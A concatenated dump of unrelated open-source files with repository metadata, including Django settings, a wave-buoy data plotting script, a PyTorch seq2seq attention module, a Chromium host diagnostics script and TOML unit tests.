# Empty list: with DEBUG on, Django falls back to localhost-style hosts only.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'music'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
| [
"prnvshrn@gmail.com"
] | prnvshrn@gmail.com |
4b0005ae4464e908e24fe17be4603c3c86f323c1 | 8624423690e559285714fb3de0ca0c7a3dc61644 | /wis_aggregate.py | 5e5729796e44cce97e7619266deac4261122db0e | [] | no_license | randobucci/wis-cdip-compare | d460e3e1d94bba5b39136a0ed92f55c96a73ba00 | 734e82ec5b468e5f09ea9b3df4045bfa5d5d8bd5 | refs/heads/master | 2020-05-30T05:14:22.418181 | 2019-05-31T08:25:36 | 2019-05-31T08:28:29 | 189,555,310 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,011 | py | '''
* wis_aggregate.py
* WIS data are organized by month, this code will aggregate
* Aggregate individual WIS netcdf files for entire year and plot
* https://chlthredds.erdc.dren.mil/thredds/catalog/wis/Atlantic/ST44098/2008/catalog.html
exec(open("wis_aggregate.py").read())
'''
#- Import libraries
import netCDF4
import xarray as xr
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.dates as mat_dates
from datetime import datetime
from dateutil.rrule import rrule, MONTHLY
import dateutil.parser
import time
import calendar
#- NDBC Station
ndbc_id = '44098' #- 160- jeffrey's Ledge
cdip_id = '163'
buoy_name = 'Jeffreys Ledge'
region = 'Atlantic'
start_date = '20080101'
# NOTE(review): end_date is assigned twice; the second assignment (20080430)
# wins, so only Jan-Apr 2008 is processed -- presumably a debugging leftover.
end_date = '20081231'
end_date = '20080430'
#- Define a function to convert date_string (YYYYMMDD) to datetime obj
def str_datetime(d):
    """Parse a YYYYMMDD date string into a datetime object."""
    return datetime.strptime(d, '%Y%m%d')
#- convert to datetime objects
start_dt = str_datetime(start_date)
end_dt = str_datetime(end_date)
#- get a list of months between start and end time
dates = [dt for dt in rrule(MONTHLY, dtstart=start_dt,until=end_dt)]
#- Read in data from muli-file netCDF dataset.
#- Reference: https://unidata.github.io/netcdf4-python/netCDF4/index.html#section8
fnames = []
for dt in dates:
year = dt.strftime('%Y') #- '2008'
month = dt.strftime('%m') #- '02'
wis_url = 'https://chlthredds.erdc.dren.mil/thredds/dodsC/wis/'+ \
region+'/ST'+ndbc_id+'/'+year+'/'
nc_file = 'WIS-ocean_waves_ST'+ndbc_id+'_'+year+month+'.nc'
fnames.append(wis_url+nc_file)
#- Try using xarray library to merge mulitple netCDF files
DS = xr.open_mfdataset(fnames)
#- Use xarray.values to get values as numpy object
nc_time = DS.time.values
#- Function to convert numpy64 to datetime
#- https://gist.github.com/blaylockbk/1677b446bc741ee2db3e943ab7e4cabd
def to_datetime(date):
    """Convert a numpy.datetime64 value to a python datetime (UTC).

    date -- a np.datetime64 object; returns the equivalent datetime.
    """
    epoch = np.datetime64('1970-01-01T00:00:00')
    seconds = (date - epoch) / np.timedelta64(1, 's')
    return datetime.utcfromtimestamp(seconds)
wave_time = [to_datetime(t) for t in nc_time]
Hs = DS.waveHs.values
Tp = DS.waveTp.values
Dp = DS.waveMeanDirection.values
# Function to find nearest value in numpy array
def find_nearest(array,value):
    """Return the element of *array* closest to *value*."""
    best = np.abs(array - value).argmin()
    return array[best]
# Function to convert from human-format to UNIX timestamp
def get_timestamp(humanTime,dateFormat):
    """Convert a human-readable time string to a UNIX timestamp.

    Uses time.mktime, so the string is interpreted in the local timezone.
    """
    parsed = datetime.strptime(humanTime, dateFormat)
    return int(time.mktime(parsed.timetuple()))
'''
#- Get time indices: That is find the UNIX timestamp values that correspond to Start and End dates entered above
#- Note: this isn't important if small time-series, gets more important for large datasets
unix_start = get_timestamp(start_date,"%Y%m%d")
nearest_start = find_nearest(nc_time, unix_start) # Find the closest unix timestamp
start_index = np.where(nc_time==nearest_start)[0][0] # Grab the index number of found date
unix_end = get_timestamp(end_date,"%Y%m%d")
future = find_nearest(nc_time, unix_end) # Find the closest unix timestamp
end_index = np.where(nc_time==future)[0][0] # Grab the index number of found date
'''
#- Plot wave bulk parameters
# Create figure and specify subplot orientation (3 rows, 1 column), shared x-axis, and figure size
f, (pHs, pTp, pDp) = plt.subplots(3, 1, sharex=True, figsize=(15,10))
# Create 3 stacked subplots for three PARAMETERS (Hs, Tp, Dp)
pHs.plot(wave_time,Hs,'b')
pTp.plot(wave_time,Tp,'b')
pDp.scatter(wave_time,Dp,color='blue',s=5) # Plot Dp variable as a scatterplot, rather than line
#- plot title
# NOTE(review): `nc` is never defined in this script (the dataset is opened
# as `DS` via xarray above), so this line raises NameError at runtime -- it
# looks like a leftover from a netCDF4.Dataset version; probably the title
# attribute of DS was intended.  Likewise `plt` is used below although
# matplotlib.pyplot appears to be imported without the `plt` alias -- verify
# the import block.
plot_title = nc.title+': STN '+ndbc_id+' ('+cdip_id+')'
# Set Titles
plt.suptitle(plot_title, fontsize=30, y=0.99)
plt.title(start_date + " - " + end_date, fontsize=20, y=3.45)
# Set tick parameters
pHs.set_xticklabels(['1','6','11','16','21','26','31'])
pHs.tick_params(axis='y', which='major', labelsize=12, right='off')
pHs.tick_params(axis='x', which='major', labelsize=12, top='off')
# Set x-axis tick interval to every 5 days
months = mat_dates.MonthLocator(interval=1)
daysFmt = mat_dates.DateFormatter('%m/%d')
plt.gca().xaxis.set_major_locator(months)
plt.gca().xaxis.set_major_formatter(daysFmt)
# Label x-axis
plt.xlabel('Month', fontsize=18)
# Make a second y-axis for the Hs plot, to show values in both meters and feet
pHs2 = pHs.twinx()
# Set y-axis limits for each plot
pHs.set_ylim(0,8)
pHs2.set_ylim(0,25)
pTp.set_ylim(0,28)
pDp.set_ylim(0,360)
# Label each y-axis
pHs.set_ylabel('Hs(m)', fontsize=18)
pHs2.set_ylabel('Hs(ft)', fontsize=18)
pTp.set_ylabel('Tp(s)', fontsize=18)
pDp.set_ylabel('Dmean(deg)', fontsize=18)
# Plot dashed gridlines
pHs.grid(b=True, which='major', color='b', linestyle='--')
pTp.grid(b=True, which='major', color='b', linestyle='--')
pDp.grid(b=True, which='major', color='b', linestyle='--')
plt.show()
| [
"randy@cdip.ucsd.edu"
] | randy@cdip.ucsd.edu |
ccf80a462e22e35169a4f53dd0765364f0bf06a1 | 2313b8b300e9b4d93c389b99a88ddde62777cbec | /manage.py | 075a44e92a62accef1629bc40ba5b8236461719e | [] | no_license | sandeep9889/Ecom-website-my-dark_cart- | dabe0fa755987325ab022e8260ed9466486715cb | 77ac1f9c0df2df3a8176d28aaeb7e7cc865166ef | refs/heads/main | 2023-08-15T00:14:54.365697 | 2021-09-26T06:58:32 | 2021-09-26T06:58:32 | 407,761,521 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run administrative tasks."""
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mdc.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from exc
    execute_from_command_line(sys.argv)
# Standard Django entry point: only run the CLI when executed as a script.
if __name__ == '__main__':
    main()
| [
"sandeepchauhan9630228313@gmail.com"
] | sandeepchauhan9630228313@gmail.com |
44c0c2a25289a830352fffb362482c33d19f8786 | 9eb2f8869841ac3cead8a2d078251acaf60e63f5 | /gym-sampler/gym_sampler/__init__.py | d824f26e2d0a4221989134dfe5234164bd727f0c | [] | no_license | sugadev/CS744-Approximate-Graph-Analytics | 70ef928f7d46f1c60dfb5119d0e4582b0eeec7b8 | 5546459b2025e78981352c065955efc73e2fa5fd | refs/heads/master | 2020-05-05T09:43:32.619115 | 2019-05-11T06:34:16 | 2019-05-11T06:34:16 | 179,914,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 124 | py | from gym.envs.registration import register
# Register the custom environment with Gym so it can be created via
# gym.make('sampler-v0'); entry_point is the dotted path to the env class.
register(
    id='sampler-v0',
    entry_point='gym_sampler.envs:SamplerEnv',
)
| [
"daravinds@gmail.com"
] | daravinds@gmail.com |
48340745ab9a0236bbd3bac3aaebc3bdea5cf6b8 | 7dad7678182d8d7c6ae154b5a1fb9acf9591569f | /params.py | bc52be08af46fbcecbde5422a078f15eed545394 | [] | no_license | aalbahem/CQA_Diversification | e9496885438aac489feb39d49a1f82a43358dbad | 979837799850c53e392e3f2a08df7f06d9174009 | refs/heads/master | 2021-10-11T07:43:46.849876 | 2019-01-23T10:38:27 | 2019-01-23T10:38:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | num_iters = 1501
# Training hyperparameters -- names suggest a word-vector / tensor-slice
# model with an LSTM component; confirm semantics against the training script.
batch_size = 5  # was 10000 -- reduced, presumably for debugging; TODO confirm
corrupt_size = 3
slice_size = 5
wv_size = 100              # word-vector dimensionality
regularization = 0.0001
save_per_iter = 50         # checkpoint interval, in iterations
learning_rate = 0.001
max_sentence_length = 100
lstm_size = 50
output_path = 'output/'    # directory where results/checkpoints are written
| [
"shahar76@gmail.com"
] | shahar76@gmail.com |
0949b4ee43b9c08b0b51e8c536a1100b9876b8d6 | 3b21c2a5422dc2b900f65894849e7e2e765fc7cc | /Kernel.py | 826a4f1526122ef14a5e4576a9be89b475d4390a | [] | no_license | mrbhjv/dft_python | 2c519dcdb5100511376c35db63c0248628fb9b3e | 480fffd81374f37f6a62c362fb551b2021772429 | refs/heads/master | 2020-04-24T09:04:28.412581 | 2011-07-21T12:23:47 | 2011-07-21T12:23:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,527 | py | import math
import random
from scipy import ndimage
import numpy
import copy
def convolve(input, kernel):
    """Convolve *input* with a separable n-dimensional kernel.

    Applies each 1-D separated kernel part along its own axis in turn,
    with wrap-around boundary handling; the input array is not modified.
    """
    result = copy.copy(input)
    for axis_index in range(kernel.get_dimensionality()):
        ndimage.convolve1d(result,
                           kernel.get_separated_kernel_part(axis_index),
                           axis=axis_index,
                           output=result,
                           mode='wrap')
    return result
class Kernel:
    """Base class for n-dimensional separable kernels.

    Subclasses are expected to set _dimensionality, _dimension_sizes and
    _separated_kernel_parts and to implement _calculate_kernel().
    """
    def __init__(self, amplitude):
        self._amplitude = amplitude
        # Filled in by subclasses once the kernel shape is known.
        self._dimensionality = None
    def get_amplitude(self):
        return self._amplitude
    def get_separated_kernel_part(self, dimension_index):
        self._check_dimension_index(dimension_index)
        return self._separated_kernel_parts[dimension_index]
    def get_separated_kernel_parts(self):
        return self._separated_kernel_parts
    def get_dimension_size(self, dimension_index):
        return self._dimension_sizes[dimension_index]
    def get_dimension_sizes(self):
        return self._dimension_sizes
    def get_dimensionality(self):
        return self._dimensionality
    def set_amplitude(self, amplitude):
        # A new amplitude invalidates the sampled kernel values.
        self._amplitude = amplitude
        self._calculate_kernel()
    def _check_dimension_index(self, dimension_index):
        # NOTE(review): reports the problem on stdout rather than raising.
        if dimension_index < 0 or dimension_index >= self._dimensionality:
            print("Error. Kernel only has", self._dimensionality, "dimensions.")
    def _calculate_kernel(self):
        # Subclass hook; the base kernel has nothing to compute.
        pass
class GaussKernel(Kernel):
    """n-dimensional separable Gauss kernel.

    The kernel is stored as one sampled 1-D Gaussian profile per dimension;
    convolving with each part in turn is equivalent to convolving with the
    full n-dimensional Gaussian.
    """
    def __init__(self, amplitude, widths, shifts=None):
        """
        amplitude -- peak value of the combined kernel
        widths    -- list of Gaussian sigmas, one per dimension
        shifts    -- optional list of per-dimension center offsets
                     (defaults to zero shift in every dimension)
        """
        Kernel.__init__(self, amplitude)
        self._widths = widths
        self._shifts = None
        self._dimensionality = len(self._widths)
        self._dimension_sizes = None
        # Values below this threshold are cut off when choosing the sampled
        # size of each 1-D profile.
        self._limit = 0.1
        self._separated_kernel_parts = None
        if (shifts is None):
            self._shifts = [0.0] * self._dimensionality
        else:
            if (len(self._widths) != len(shifts)):
                print("Error. Number of shift and width values does not match.")
            # BUG FIX: the original compared len(self._shifts) while it was
            # still None and never stored the supplied shifts, so any
            # non-default `shifts` argument crashed with a TypeError.
            self._shifts = shifts
        self._calculate_separated_kernel_parts()
    def get_width(self, dimension_index):
        self._check_dimension_index(dimension_index)
        return self._widths[dimension_index]
    def get_widths(self):
        return self._widths
    def get_shift(self, dimension_index):
        self._check_dimension_index(dimension_index)
        return self._shifts[dimension_index]
    def get_shifts(self):
        return self._shifts
    def set_width(self, width, dimension_index):
        """Set the sigma of one dimension and recompute the kernel parts."""
        self._check_dimension_index(dimension_index)
        self._widths[dimension_index] = width
        self._calculate_separated_kernel_parts()
    def set_shift(self, shift, dimension_index):
        """Set the center shift of one dimension and recompute the kernel parts."""
        self._check_dimension_index(dimension_index)
        # BUG FIX: the original assigned `self._shifts = shifts`, which raised
        # NameError and ignored both arguments.
        self._shifts[dimension_index] = shift
        self._calculate_separated_kernel_parts()
    def _calculate_dimension_size(self, dimension_index):
        """Choose an odd sample count so the profile stays above self._limit."""
        if not (dimension_index >= 0 and dimension_index < self._dimensionality):
            print("Error. Kernel only supports ", self._dimensionality, " dimensions.")
        dimension_width = self._widths[dimension_index]
        if (dimension_width < 10000 and dimension_width > 0):
            # Solve |A| * exp(-x^2 / (2 sigma^2)) = limit for x.
            dimension_size = int(round(math.sqrt(2.0 * math.pow(dimension_width, 2.0) \
                * math.log(math.fabs(self._amplitude) / self._limit))) + 1)
        else:
            # NOTE(review): on this path dimension_size is never assigned, so
            # the return below raises UnboundLocalError after the message.
            print("Error. Selected mode with is not in the proper bounds (0 < width < 10000).")
        # Force an odd size so the profile has a well-defined center sample.
        if (dimension_size % 2 == 0):
            dimension_size += 1
        return dimension_size
    def _calculate_kernel(self):
        self._calculate_separated_kernel_parts()
    def _calculate_separated_kernel_parts(self):
        """Resample every 1-D Gaussian profile from the current parameters."""
        if (self._separated_kernel_parts is not None):
            del(self._separated_kernel_parts[:])
        else:
            self._separated_kernel_parts = []
        for dimension_index in range(self._dimensionality):
            dimension_size = self._calculate_dimension_size(dimension_index)
            center = (dimension_size / 2.0) + self._shifts[dimension_index]
            kernel_part = numpy.zeros(shape=dimension_size)
            ramp = numpy.linspace(0, dimension_size, dimension_size)
            for i in range(dimension_size):
                kernel_part[i] = math.exp(-math.pow(ramp[i] - center, 2.0) / \
                    (2.0 * math.pow(self._widths[dimension_index], 2.0)))
            # normalize kernel part
            kernel_part *= 1.0 / kernel_part.sum()
            # multiply the first kernel part with the amplitude.
            # when convolving with all separated kernel parts, this will lead
            # to the correct amplitude value for the "whole kernel"
            if (dimension_index == 0):
                kernel_part *= self._amplitude
            self._separated_kernel_parts.append(kernel_part)
class BoxKernel(Kernel):
    """One-dimensional box (constant) kernel."""
    def __init__(self, amplitude = 5.0):
        Kernel.__init__(self, amplitude)
        self._dimensionality = 1
        self._calculate_kernel()
    def get_separated_kernel_part(self, dimension_index):
        # A box kernel has a single part; the index argument is ignored.
        return self._kernel
    def _calculate_kernel(self):
        # Single-sample constant profile scaled by the amplitude.
        self._kernel = numpy.ones(1) * self._amplitude
| [
"mathis.richter@ini.rub.de"
] | mathis.richter@ini.rub.de |
4b8c608768319214ed0575a4a3b2502fe5abc8f8 | b5b7607ed739d76064409363a6e7a7fcec7243d6 | /vms/migrations/0002_remove_customer_last_error_time.py | db2a4217b161094915f90d3a42fbefd54cc6329b | [] | no_license | mrleerkotte/vm2ssp-django | d7d07a05ab322b55129803174815bb1522261412 | 0534cc56a76da41ef40d8efc25ffcde83354c3d0 | refs/heads/master | 2020-03-18T23:52:04.333841 | 2018-05-30T11:47:02 | 2018-05-30T11:47:02 | 135,434,591 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | # Generated by Django 2.0.2 on 2018-05-10 14:48
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('vms', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='customer',
name='last_error_time',
),
]
| [
"marlon@leerkotte.net"
] | marlon@leerkotte.net |
69c2a77c69b7711113375217f5e65e281a3b23d8 | baae26fa241488e1461083edb4f1576ad4a58dfc | /attention_module.py | 36e9022a542f68158cd2bc71980147e3b46f5cf2 | [] | no_license | 2020-WORKSPACE/DataScience | 4a8d8674d9749522c973c2316020aecc558d200b | 93c73fed1eaed581fd9fed43de8650bc77971983 | refs/heads/master | 2022-11-15T15:51:54.777649 | 2020-06-28T11:24:26 | 2020-06-28T11:24:26 | 271,176,780 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,956 | py | #####################################################
# Bong Won Jang's Code
# - 2020 06 15 22:28 ☑️
#####################################################
import torch
import torch.nn as nn
import torch.nn.functional as F
############################################
# Encoder
#
# Encoder for seq2seq model with attention mechanism
# This Encoder is based on a LSTM structure
############################################
class Encoder(nn.Module):
    """LSTM encoder for a seq2seq model with attention.

    Embeds one source-word index at a time and advances the LSTM state;
    the caller collects the per-step hidden vectors for the decoder's
    attention mechanism.
    """
    def __init__(self, input_size, hidden_size):
        """
        input_size  -- source vocabulary size (We)
        hidden_size -- size of the hidden and cell vectors (h)
        """
        super(Encoder, self).__init__()
        self.input_size = input_size
        self.hidden_size = hidden_size
        self.cell_size = hidden_size
        # Embedding table (We * h); rows are looked up directly in forward().
        self.embedding_matrix = nn.Embedding(self.input_size, self.hidden_size)
        self.lstm = nn.LSTM(self.hidden_size, self.hidden_size)
    def forward(self, word_num, hidden, cell):
        """Encode one word index.

        word_num -- integer index of the source word
        hidden   -- current hidden state (1 * 1 * h)
        cell     -- current cell state (1 * 1 * h)
        Returns (output, next_hidden, next_cell), each of shape (1 * 1 * h).
        """
        emb = self.embedding_matrix.weight[word_num].view(1, 1, -1)
        out, (next_hidden, next_cell) = self.lstm(emb, (hidden, cell))
        return out, next_hidden, next_cell
    def initHidden(self, device):
        """Zero initial hidden state (1 * 1 * h) on the given device."""
        return torch.zeros(1, 1, self.hidden_size, device=device)
    def initCell(self, device):
        """Zero initial cell state (1 * 1 * h) on the given device."""
        return torch.zeros(1, 1, self.cell_size, device=device)
############################################
# Decoder
#
# Decoder half of a seq2seq model with dot-product attention over the
# encoder's hidden states, built around a single-layer LSTM.
############################################
class Decoder(nn.Module):
    ############################################
    # __init__
    #
    # <parameters>
    # - output_size : size of the output-word vocabulary (target language)
    # - hidden_size : size of the hidden vector
    ############################################
    def __init__(self, output_size, hidden_size):
        super(Decoder, self).__init__()
        self.output_size = output_size  # scalar : Wd
        self.hidden_size = hidden_size  # scalar : h
        self.cell_size = hidden_size  # scalar : h
        self.embedding_matrix = nn.Embedding(self.output_size, self.hidden_size)  # matrix : (Wd * h)
        self.lstm = nn.LSTM(hidden_size, hidden_size)
        # Projects [attention context ; hidden], a (1 * 2h) vector, to vocab logits:
        # (1 * Wd) = (1 * 2h) x (2h * Wd)
        self.out_linear = nn.Linear(self.hidden_size * 2, self.output_size)
    ############################################
    # forward
    #
    # Runs one decode step: embeds the previous target word, advances the
    # LSTM, attends over the encoder states, and emits log-probabilities
    # over the output vocabulary.
    #
    # <parameters>                                          <size>
    # - word_num : number of the previous target word       : scalar
    # - hidden : previous hidden state                      : h
    # - cell : previous cell state (c_0 is the zero vector) : h
    # - hs : pile of all hidden vectors from the encoder    : (N * h)
    #
    # <return>
    # - y : log-softmax distribution over the vocabulary, (1 * Wd)
    # - hn : next hidden state
    # - cn : next cell state
    # - attn_distr : attention weights over the N encoder states, (1 * N)
    ############################################
    def forward(self, word_num, hidden, cell, hs):
        embedding_vector = self.embedding_matrix(word_num).view(1, 1, -1)  # matrix : (1 * 1 * h)
        o, (hn, cn) = self.lstm(embedding_vector, (hidden, cell))  # o, hn, cn : (1 * 1 * h)
        # Dot-product attention: score each encoder state against the new hidden state.
        attn_score = torch.mm(hs, hn.view(-1, 1)).view(1, -1)  # (1 * N) = (N * h) x (h * 1)
        attn_distr = F.softmax(attn_score, dim=1)  # (1 * N) = softmax(1 * N)
        attn_output = torch.mm(attn_distr, hs)  # (1 * h) = (1 * N) x (N * h)
        #################################
        # log_softmax (not plain softmax) so the result can be fed straight
        # into NLLLoss.
        #################################
        y = F.log_softmax(self.out_linear(torch.cat((attn_output, hn.view(1, -1)), dim=1)), dim=1)  # (1 * Wd)
        return y, hn, cn, attn_distr
    ############################################
    # initHidden
    #
    # <parameters>
    # - device : torch device the tensor should be created on
    #
    # <return>
    # - initial hidden vector : zero tensor of shape (1, 1, hidden_size)
    #
    # (Translated note: the original author was unsure why PyTorch requires
    # a 3-D state here -- the LSTM API takes (num_layers, batch, hidden).)
    ############################################
    def initHidden(self, device):
        return torch.zeros(1, 1, self.hidden_size, device=device)
    ############################################
    # initCell
    #
    # <parameters>
    # - device : torch device the tensor should be created on
    #
    # <return>
    # - initial cell vector : zero tensor of shape (1, 1, cell_size)
    ############################################
    def initCell(self, device):
        return torch.zeros(1, 1, self.cell_size, device=device)
| [
"noreply@github.com"
] | noreply@github.com |
e8d813ee2bbd08042d7a9a7b775b27efe30c22f9 | 45dec2872306279bda5c060181952657e87c941a | /src/testing/scripts/host_info.py | 37fa54b4ebdd5f9beb1689a2a9356742c328d3a4 | [
"BSD-3-Clause"
] | permissive | mbbill/Chromium_Base | 717266ab816f65125ddffd2f22ea3b562c9bf0c9 | 12d8ff888632345762e13c997fa78a7992881cc8 | refs/heads/master | 2020-04-16T01:53:00.094385 | 2017-02-14T02:44:23 | 2017-02-14T02:44:23 | 62,381,185 | 17 | 14 | null | null | null | null | UTF-8 | Python | false | false | 3,754 | py | #!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import multiprocessing
import os
import platform
import subprocess
import sys
import common
def is_linux():
  """Returns True when running on a Linux host."""
  return sys.platform[:5] == 'linux'
def get_free_disk_space(failures):
  """Returns the amount of free space on the current disk, in GiB.

  On non-POSIX systems an entry is appended to `failures` and 0 is returned.

  Returns:
    The amount of free space on the current disk, measured in GiB.
  """
  if os.name != 'posix':
    failures.append('get_free_disk_space: OS %s not supported.' % os.name)
    return 0
  # Stat the current path for info on the current disk.
  stats = os.statvfs('.')
  # Fragment size * free blocks available to unprivileged users, in GiB.
  return stats.f_frsize * stats.f_bavail / (1024.0 ** 3)
def get_num_cpus(failures):
  """Returns the number of logical CPUs on this machine.

  Returns:
    The number of logical CPUs on this machine, or 'unknown' if indeterminate.
  """
  try:
    count = multiprocessing.cpu_count()
  except NotImplementedError:
    failures.append('get_num_cpus')
    return 'unknown'
  return count
def get_device_info(args, failures):
  """Parses the device info for each attached device, and returns a summary
  of the device info and any mismatches.

  Runs devil's device_status.py tool and summarizes attached-device serials
  and build fingerprints. Any build detail that differs across devices is
  reported as 'MISMATCH' and recorded in `failures`, as is each blacklisted
  device.

  Returns:
    A dict indicating the result (empty on non-Linux hosts or tool failure).
  """
  if not is_linux():
    return {}
  with common.temporary_file() as tempfile_path:
    rc = common.run_command([
        sys.executable,
        os.path.join(args.paths['checkout'],
                     'third_party',
                     'catapult',
                     'devil',
                     'devil',
                     'android',
                     'tools',
                     'device_status.py'),
        '--json-output', tempfile_path,
        '--blacklist-file', os.path.join(
            args.paths['checkout'], 'out', 'bad_devices.json')])
    if rc:
      failures.append('device_status')
      return {}
    with open(tempfile_path, 'r') as src:
      device_info = json.load(src)
  results = {}
  results['devices'] = sorted(v['serial'] for v in device_info)
  details = [
      v['ro.build.fingerprint'] for v in device_info if not v['blacklisted']]
  # Colon-separated fingerprint fields: 0=device name, 1=build version,
  # 2=build type (per the parsed_details keys below).
  def unique_build_details(index):
    return sorted(list(set([v.split(':')[index] for v in details])))
  parsed_details = {
      'device_names': unique_build_details(0),
      'build_versions': unique_build_details(1),
      'build_types': unique_build_details(2),
  }
  # Fix: .items() instead of the Python-2-only .iteritems(), so this module
  # also runs under Python 3 (identical behavior on Python 2).
  for k, v in parsed_details.items():
    if len(v) == 1:
      results[k] = v[0]
    else:
      results[k] = 'MISMATCH'
      results['%s_list' % k] = v
      failures.append(k)
  for v in device_info:
    if v['blacklisted']:
      failures.append('Device %s blacklisted' % v['serial'])
  return results
def main_run(args):
  """Gathers host diagnostics and writes them as a JSON blob to args.output.

  Returns:
    0 on success, common.INFRA_FAILURE_EXIT_CODE when any check recorded a
    failure.
  """
  failures = []
  # Dict literal keeps the original evaluation order (num_cpus before
  # free_disk_space, devices last) so `failures` accumulates identically.
  host_info = {
      'os_system': platform.system(),
      'os_release': platform.release(),
      'processor': platform.processor(),
      'num_cpus': get_num_cpus(failures),
      'free_disk_space': get_free_disk_space(failures),
      'python_version': platform.python_version(),
      'python_path': sys.executable,
  }
  host_info['devices'] = get_device_info(args, failures)
  json.dump({
      'valid': True,
      'failures': failures,
      '_host_info': host_info,
  }, args.output)
  if failures:
    return common.INFRA_FAILURE_EXIT_CODE
  return 0
def main_compile_targets(args):
  """This script has no compile targets; writes an empty JSON list."""
  targets = []
  json.dump(targets, args.output)
if __name__ == '__main__':
  # Dispatch table: sub-command name -> handler. common.run_script picks and
  # invokes one based on the command-line arguments.
  funcs = {
      'run': main_run,
      'compile_targets': main_compile_targets,
  }
  sys.exit(common.run_script(sys.argv[1:], funcs))
| [
"mbbill@gmail.com"
] | mbbill@gmail.com |
63d35cddd89c965242e94321cf091a8e71be87ec | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/verbs/_swivels.py | ee26ae2f31371bd1bbcf01ad3ec765b20b2961cb | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py |
from xai.brain.wordbase.verbs._swivel import _SWIVEL
#calss header
# Plural word entry for "swivel"; inherits all behavior from _SWIVEL and only
# overrides the identifying metadata fields.
class _SWIVELS(_SWIVEL):
    def __init__(self):
        super().__init__()
        self.name = "SWIVELS"
        self.specie = 'verbs'
        self.basic = "swivel"
        self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
d5fc867cf915437ad5f65f07e94dd1e3c0cf089d | 101ffbee515a5b8f23d77361558dea1e42794dbd | /pip_save/toml/tests/test_writer/test_statement_nodes.py | 87c6eb7bd5d88df7645289d2751f38fa6795af0e | [] | no_license | mkurnikov/pip-save | 0a841710c28983c1c769d87e18f2e584a554e1a1 | e1e2fb9b0404a25790edcb5fd134267b92675470 | refs/heads/master | 2021-01-12T16:49:50.163661 | 2016-10-21T11:13:37 | 2016-10-21T11:13:37 | 71,442,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,008 | py | from collections import OrderedDict
from unittest import TestCase
from pip_save.toml.model import TomlStatementNodes, Table
class TestStatementNodes(TestCase):
    def test_append(self):
        """A freshly appended key is counted and discoverable by membership."""
        nodes = TomlStatementNodes()
        nodes[('keyword',)] = '1'
        self.assertEqual(len(nodes), 1)
        self.assertTrue(('keyword',) in nodes)

    def test_insert_after(self):
        """insert_after places the new key immediately after the anchor key."""
        initial = OrderedDict()
        initial[('deps',)] = Table()
        initial[('django',)] = '1.10.2'
        nodes = TomlStatementNodes(initial)
        nodes.insert_after(('deps',), ('flask',), '1.3')
        self.assertEqual(nodes.keys(), [('deps',), ('flask',), ('django',)])

    def test_insert_before(self):
        """insert_before places the new key immediately before the anchor key."""
        initial = OrderedDict()
        initial[('deps',)] = Table()
        initial[('django',)] = '1.10.2'
        nodes = TomlStatementNodes(initial)
        nodes.insert_before(('django',), ('flask',), '1.3')
        self.assertEqual(nodes.keys(), [('deps',), ('flask',), ('django',)])
| [
"maxim.kurnikov@gmail.com"
] | maxim.kurnikov@gmail.com |
